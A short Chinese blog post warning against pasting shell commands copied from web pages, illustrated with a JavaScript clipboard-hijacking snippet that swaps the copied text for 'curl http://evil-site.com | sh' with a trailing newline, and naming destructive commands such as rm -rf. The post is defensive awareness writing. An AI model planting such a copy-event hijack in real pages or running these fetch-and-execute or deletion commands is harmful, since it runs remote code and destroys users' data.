千万不要往 Shell 里粘贴命令!

对于用惯了 IDE 的程序员来说,在终端里敲命令可能没那么顺手,也记不住那么多复杂的命令。比较偷懒的做法就是网上搜相关的命令,复制到剪贴板往命令行窗口里一贴,完事!

但是这么做有很大的风险,为什么呢?

网页里复制的东西,可能并不是你看到的内容。请看大屏幕:

1
<div class="copyme">$ echo "伪装成普通命令"</div>
1
2
3
4
5
6
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'curl http://evil-site.com | sh \n' // 复制了真实命令
);
e.preventDefault();
});

看到了吧,利用 DOM 的copy事件,可以往剪贴板里放自定义内容。有人可能会说复制了命令我还没回车,不会执行呀!图样图森破,尾巴上带个换行符\n,回车都为你代劳了!

这要是复制上了一些危险的命令,比如rm -rfmv folder /dev/null 之类的,执行后就爽歪歪了。

所以,为了安全,不要随便往 shell 里粘贴命令。如果一定要复制粘贴,看清楚剪贴板里的内容再执行!

Kayson Li wechat
看到这个颇有气质的 logo,不来关注下吗?
坚持原创技术分享,您的支持将鼓励我继续创作!